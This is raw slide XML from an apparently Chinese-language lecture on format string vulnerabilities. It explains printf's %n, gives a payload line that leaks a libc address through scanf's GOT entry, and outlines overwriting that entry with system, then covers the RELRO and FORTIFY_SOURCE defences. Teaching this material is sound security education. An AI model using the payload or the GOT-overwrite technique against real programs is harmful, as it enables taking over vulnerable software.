            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>没有开启 RELRO 保护的时候，还可以更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="3308350"/>
            <a:ext cx="3507740" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%n - 将之前打印出来的字符个数，赋值参数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>只能修改后面的参数？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为什么不看看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>神奇的朋友呢</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604385" y="1830705"/>
            <a:ext cx="2540000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>把大象装进冰箱里：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>• 确定覆盖地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>• 确定相对偏移</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>• 进行覆盖</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7320915" y="2384425"/>
            <a:ext cx="4140835" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>payload = '%7$s' + p32(code.got['__isoc99_scanf'])</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="直接连接符 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7047230" y="1350010"/>
            <a:ext cx="0" cy="485013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85685" y="3308350"/>
            <a:ext cx="4291965" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将栈上的第7个参数（也就是第二部分）进行%s的解析，读取该地址指向的字符串</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7494270" y="4441825"/>
            <a:ext cx="4346575" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对scanf的got表指向的libc地址进行字符串解析并输出，完成了libc的泄露</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="942340" y="1350010"/>
            <a:ext cx="3062605" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>str=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>"hhh%n",&amp;a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="图片 31"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1256030" y="1957705"/>
            <a:ext cx="1402080" cy="944880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7494270" y="5278120"/>
            <a:ext cx="4346575" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>怎么修改？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过 libc 计算得到 system 的地址，把 system 的地址写到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的 GOT 表项上</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7" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30"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11" r:link="rId12"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3" r:link="rId14" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6269233"/>
            <a:ext cx="720090" cy="588767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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折角形 33"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>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任意多边形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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漏洞场景</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792480" y="2972435"/>
            <a:ext cx="4816475" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>格式化字符串函数：将计算机内存中表示的数据转化为我们人类可读的字符串格式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会触发该漏洞的函数很有限，主要就是printf、sprintf、fprintf等print家族函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6522720" y="1797050"/>
            <a:ext cx="7093585" cy="3534410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>函数	基本介绍</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>	输出到 stdout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>fprintf	输出到指定 FILE 流</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>vprintf	根据参数列表格式化输出到 stdout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>vfprintf	根据参数列表格式化输出到指定 FILE 流</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>sprintf	输出到字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>snprintf	输出指定字节数到字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>vsprintf	根据参数列表格式化输出到字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>vsnprintf	根据参数列表格式化输出指定字节到字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>等等</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email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11471910" y="6269233"/>
            <a:ext cx="720090" cy="588767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" r:link="rId12" cstate="email"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6269233"/>
            <a:ext cx="720090" cy="588767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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91440" tIns="45720" rIns="91440" bIns="4572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200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防护措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649995" y="1880529"/>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1345" y="1162050"/>
            <a:ext cx="3247390" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>简单介绍两种缓解措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541655" y="1860550"/>
            <a:ext cx="3625850" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>RELRO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>重定位表只读</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="2592705"/>
            <a:ext cx="5918200" cy="2249170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GCC, GNU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linker以及Glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linker一起实现了read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> only relocation。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>大概实现就是由linker指定binary的一块经过dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linker处理过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>relocation之后的区域为只读</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="5085715"/>
            <a:ext cx="5715635" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开启方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>gcc -o test test.c // 默认情况下，是Partial RELRO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>gcc -z now -o test test.c	// 全部开启</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7049770" y="1946275"/>
            <a:ext cx="2540000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.FORTIFY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6909435" y="2490470"/>
            <a:ext cx="5062855" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>由GCC实现的源码级别的保护机制，其功能是在编译的时候检查源码以避免潜在的缓冲区溢出等错误。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7030085" y="3412490"/>
            <a:ext cx="4820920" cy="1529715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>一些敏感函数如read, fgets,memcpy, printf等等可能导致漏洞出现的函数都会被替换成__read_chk,__fgets_chk, __memcpy_chk, __printf_chk等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6889115" y="3609340"/>
            <a:ext cx="5083175" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这些带了chk的函数会检查读取/复制的字节长度是否超过缓冲区长度，通过检查诸如%n之类的字符串位置是否位于可能被用户修改的可写地址，避免了格式化字符串跳过某些参数（如直接%7$x）等方式来避免漏洞出现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6998335" y="3412490"/>
            <a:ext cx="4885055" cy="2968625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开启方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gcc -D_FORTIFY_SOURCE=1 -O1仅仅只会在编译时进行检查 (特别像某些头文件 #include &lt;string.h&gt;)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gcc -D_FORTIFY_SOURCE=2 -O2程序执行时也会有检查 (如果检查到缓冲区溢出，就终止程序)</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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>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7" grpId="0"/>
      <p:bldP spid="7" grpId="1"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="12"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23"/>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4523"/>
